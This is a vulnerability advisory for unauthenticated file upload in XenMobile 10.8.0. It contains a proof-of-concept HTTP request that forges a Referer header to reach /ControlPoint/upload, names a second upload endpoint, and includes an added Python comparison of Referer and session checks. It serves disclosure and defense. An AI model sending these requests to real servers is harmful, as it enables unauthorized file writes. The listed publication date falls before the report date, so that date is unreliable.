Advisory

XenMobile contains numerous unauthenticated file upload vulnerabilities

Overview

It is possible to upload a file to the XenMobile server without authentication by sending a request to /ControlPoint/upload that includes a Referer header claiming the request was referred from the application's own domain. Because the Referer header is supplied by the client, this check provides no authentication at all.

Proof of concept

Make the following request to the API:

    POST /ControlPoint/upload HTTP/1.1
    Host: xenmobile.example.com
    Referer: https://xenmobile.example.com/index_uc.html
    Content-Type: multipart/form-data; boundary=MultipartBoundry
    Connection: close
    Content-Length: 239

    --MultipartBoundry
    Content-Disposition: form-data; name="image"; filename="FILENAME_HERE"

    [content of file]
    --MultipartBoundry--

There are several other API endpoints that also provide this file upload functionality without authentication. For example, the /zdm/rs/xdmServices/devicepolicy/fileUpload endpoint accepts JSON data and writes it to files under /opt/sas/temp/. This functionality chooses a random filename, but then discloses that filename to the caller, so the location of the written file is not a secret.
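To make the security-relevant point concrete, the following is an added Python example (not XenMobile's code, and not part of the advisory) that places the Referer-based gate described above beside a session-based gate and evaluates both over a few constructed requests. The Request class, the session store, the cookie name and the hostname are assumptions made for illustration; only the endpoint paths come from the advisory.

```python
"""Added example: a Referer-based upload gate beside a session-based gate.
Hypothetical code, not XenMobile's implementation; Request, SESSIONS and
APP_HOST are constructed for illustration."""
from dataclasses import dataclass
from http.cookies import CookieError, SimpleCookie
from urllib.parse import urlsplit

# Upload endpoints named in the advisory
UPLOAD_PATHS = {"/ControlPoint/upload",
                "/zdm/rs/xdmServices/devicepolicy/fileUpload"}
# Constructed hostname, matching the advisory's proof-of-concept request
APP_HOST = "xenmobile.example.com"


@dataclass(frozen=True)
class Request:
    method: str
    path: str
    headers: dict  # header names lowercased, e.g. {"referer": "https://..."}


def referer_gate(req: Request, sessions: dict = None) -> bool:
    """Weak gate: allow the upload if Referer names the application's own host.
    The Referer header is chosen by the client, so this is not authentication."""
    referer = req.headers.get("referer", "")
    return urlsplit(referer).hostname == APP_HOST


def session_token(req: Request):
    """Return the value of the (assumed) 'session' cookie, or None."""
    try:
        jar = SimpleCookie(req.headers.get("cookie", ""))
    except CookieError:
        return None
    morsel = jar.get("session")
    return morsel.value if morsel is not None else None


def session_gate(req: Request, sessions: dict) -> bool:
    """Hardened gate: require a server-issued session token bound to a user.
    A header value the client makes up does not satisfy this check."""
    token = session_token(req)
    return token is not None and token in sessions


def allowed_uploads(requests, sessions, gate):
    """Paths of POST requests to the upload endpoints that the gate lets through."""
    return [r.path for r in requests
            if r.method == "POST" and r.path in UPLOAD_PATHS
            and gate(r, sessions)]


# Constructed session store: token -> user. Only the server issues tokens.
SESSIONS = {"a1b2c3d4e5f6": "mdm-admin"}

# Constructed requests: the advisory's pattern (own-domain Referer, no session),
# a logged-in client, a stale/unknown token, and an unrelated GET.
FORGED = Request("POST", "/ControlPoint/upload",
                 {"host": APP_HOST, "referer": f"https://{APP_HOST}/index_uc.html"})
LOGGED_IN = Request("POST", "/zdm/rs/xdmServices/devicepolicy/fileUpload",
                    {"host": APP_HOST, "cookie": "session=a1b2c3d4e5f6"})
UNKNOWN_TOKEN = Request("POST", "/ControlPoint/upload",
                        {"host": APP_HOST, "cookie": "session=ffffffffffff",
                         "referer": f"https://{APP_HOST}/index_uc.html"})
UNRELATED = Request("GET", "/index_uc.html", {"host": APP_HOST})
ALL = [FORGED, LOGGED_IN, UNKNOWN_TOKEN, UNRELATED]


def compare_gates():
    """Evaluate the constructed requests under both gates."""
    return {"referer_gate": allowed_uploads(ALL, SESSIONS, referer_gate),
            "session_gate": allowed_uploads(ALL, SESSIONS, session_gate)}


if __name__ == "__main__":
    for name, paths in compare_gates().items():
        print(f"{name}: {paths}")
```

The Referer gate admits every request whose Referer names the application's host, whether or not the caller ever logged in, while the session gate admits only the request carrying a token the server itself issued. Note that the session gate also rejects the request that combines a valid-looking Referer with an unknown token, which is the behaviour an authenticating proxy in front of the service should reproduce.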

Mitigation/further actions

  1. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
  2. Install an update rectifying this issue as soon as one is available

Advisory timeline

  1. 2018-03-28 – Reported to Citrix and acknowledged immediately
  2. 2018-05-21 – Issue reported fixed

CVSS

Base score: 5.3
Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Metadata

  • Severity
    Medium (base score 5.3)
  • Discovered by
    Glyn Wintle
  • Advisory ID
    dxw-2018-3564
  • CVE
    CVE-2018-10648
  • Component/package
    XenMobile
  • Version
    10.8.0
  • Published
    2018-03-26